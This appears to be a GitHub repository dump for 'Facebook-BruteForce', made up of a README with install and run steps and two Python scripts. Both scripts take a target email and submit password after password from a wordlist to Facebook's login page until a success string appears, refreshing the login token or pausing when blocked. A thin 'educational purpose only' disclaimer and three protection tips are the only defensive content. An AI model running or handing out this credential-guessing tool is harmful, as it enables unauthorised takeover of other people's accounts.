├── Screenshots ├── Capture1.JPG ├── Capture2.JPG └── Capture3.JPG ├── README.md ├── fb2.py └── fb.py /Screenshots/Capture1.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IAmBlackHacker/Facebook-BruteForce/HEAD/Screenshots/Capture1.JPG -------------------------------------------------------------------------------- /Screenshots/Capture2.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IAmBlackHacker/Facebook-BruteForce/HEAD/Screenshots/Capture2.JPG -------------------------------------------------------------------------------- /Screenshots/Capture3.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IAmBlackHacker/Facebook-BruteForce/HEAD/Screenshots/Capture3.JPG -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Facebook-BruteForce 2 | ``` 3 | Bruteforce attack, For educational purpose only 4 | ``` 5 | ## Find here a video on YouTube 6 | https://youtu.be/qIfGxDmRQIU 7 | 8 | ## Install Requirements (on Linux) 9 | ``` 10 | >> apt-get install git python3 python3-pip python python-pip 11 | ``` 12 | 13 | ## Run commands one by one 14 | ``` 15 | >> git clone https://github.com/IAmBlackHacker/Facebook-BruteForce 16 | >> cd Facebook-BruteForce 17 | >> python3 -m pip install requests bs4 18 | >> python3 -m pip install mechanize 19 | >> python3 fb.py or python fb2.py 20 | ``` 21 | 22 | ## Screenshots 23 | ![CAPTURE 1](https://github.com/IAmBlackHacker/Facebook-BruteForce/blob/master/Screenshots/Capture1.JPG) 24 | ![CAPTURE 1](https://github.com/IAmBlackHacker/Facebook-BruteForce/blob/master/Screenshots/Capture2.JPG) 25 | ![CAPTURE 1](https://github.com/IAmBlackHacker/Facebook-BruteForce/blob/master/Screenshots/Capture3.JPG) 26 | 27 | ## Protection Against Attacker 28 | * Use Strong Password(which contains standard password chars + longest as possible) 29 | * Use 2F Authentication. 30 | * Make location based login(+browser based). 31 | 32 | ## Explore More in Hacking ... 33 | https://www.facebook.com/B14CKH4K3R/ 34 | 35 | ~~~ 36 | Happy Hacking Day ! 37 | ~~~ 38 | -------------------------------------------------------------------------------- /fb2.py: -------------------------------------------------------------------------------- 1 | import time 2 | import sys 3 | 4 | if sys.version_info[0] !=2: 5 | print('''-------------------------------------- 6 | REQUIRED PYTHON 2.x 7 | use: python fb2.py 8 | -------------------------------------- 9 | ''') 10 | sys.exit() 11 | 12 | post_url='https://www.facebook.com/login.php' 13 | headers = { 14 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 15 | } 16 | 17 | try: 18 | import mechanize 19 | import urllib2 20 | browser = mechanize.Browser() 21 | browser.addheaders = [('User-Agent',headers['User-Agent'])] 22 | browser.set_handle_robots(False) 23 | except: 24 | print('\n\tPlease install mechanize.\n') 25 | sys.exit() 26 | 27 | print('\n---------- Welcome To Facebook BruteForce ----------\n') 28 | file=open('passwords.txt','r') 29 | 30 | email=str(raw_input('Enter Email/Username : ').strip()) 31 | 32 | print ("\nTarget Email ID : ",email) 33 | print "\nTrying Passwords from list ..." 34 | 35 | i=0 36 | while file: 37 | passw=file.readline().strip() 38 | i+=1 39 | if len(passw) < 6: 40 | continue 41 | print str(i) +" : ",passw 42 | response = browser.open(post_url) 43 | try: 44 | if response.code == 200: 45 | browser.select_form(nr=0) 46 | browser.form['email'] = email 47 | browser.form['pass'] = passw 48 | response = browser.submit() 49 | response_data = response.read() 50 | if 'Find Friends' in response_data or 'Two-factor authentication' in response_data or 'security code' in response_data: 51 | print('Your password is : ',passw) 52 | break 53 | except: 54 | print('\nSleeping for time : 5 min\n') 55 | time.sleep(300) 56 | -------------------------------------------------------------------------------- /fb.py: -------------------------------------------------------------------------------- 1 | import os.path 2 | import requests 3 | from bs4 import BeautifulSoup 4 | import sys 5 | 6 | if sys.version_info[0] != 3: 7 | print('''\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3 8 | fb.py\n\t--------------------------------------''') 9 | sys.exit() 10 | 11 | PASSWORD_FILE = "passwords.txt" 12 | MIN_PASSWORD_LENGTH = 6 13 | POST_URL = 'https://www.facebook.com/login.php' 14 | HEADERS = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 16 | } 17 | PAYLOAD = {} 18 | COOKIES = {} 19 | 20 | 21 | def create_form(): 22 | form = dict() 23 | cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'} 24 | 25 | data = requests.get(POST_URL, headers=HEADERS) 26 | for i in data.cookies: 27 | cookies[i.name] = i.value 28 | data = BeautifulSoup(data.text, 'html.parser').form 29 | if data.input['name'] == 'lsd': 30 | form['lsd'] = data.input['value'] 31 | return form, cookies 32 | 33 | 34 | def is_this_a_password(email, index, password): 35 | global PAYLOAD, COOKIES 36 | if index % 10 == 0: 37 | PAYLOAD, COOKIES = create_form() 38 | PAYLOAD['email'] = email 39 | PAYLOAD['pass'] = password 40 | r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS) 41 | if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text: 42 | open('temp', 'w').write(str(r.content)) 43 | print('\npassword found is: ', password) 44 | return True 45 | return False 46 | 47 | 48 | if __name__ == "__main__": 49 | print('\n---------- Welcome To Facebook BruteForce ----------\n') 50 | if not os.path.isfile(PASSWORD_FILE): 51 | print("Password file is not exist: ", PASSWORD_FILE) 52 | sys.exit(0) 53 | password_data = open(PASSWORD_FILE, 'r').read().split("\n") 54 | print("Password file selected: ", PASSWORD_FILE) 55 | email = input('Enter Email/Username to target: ').strip() 56 | for index, password in zip(range(password_data.__len__()), password_data): 57 | password = password.strip() 58 | if len(password) < MIN_PASSWORD_LENGTH: 59 | continue 60 | print("Trying password [", index, "]: ", password) 61 | if is_this_a_password(email, index, password): 62 | break 63 | --------------------------------------------------------------------------------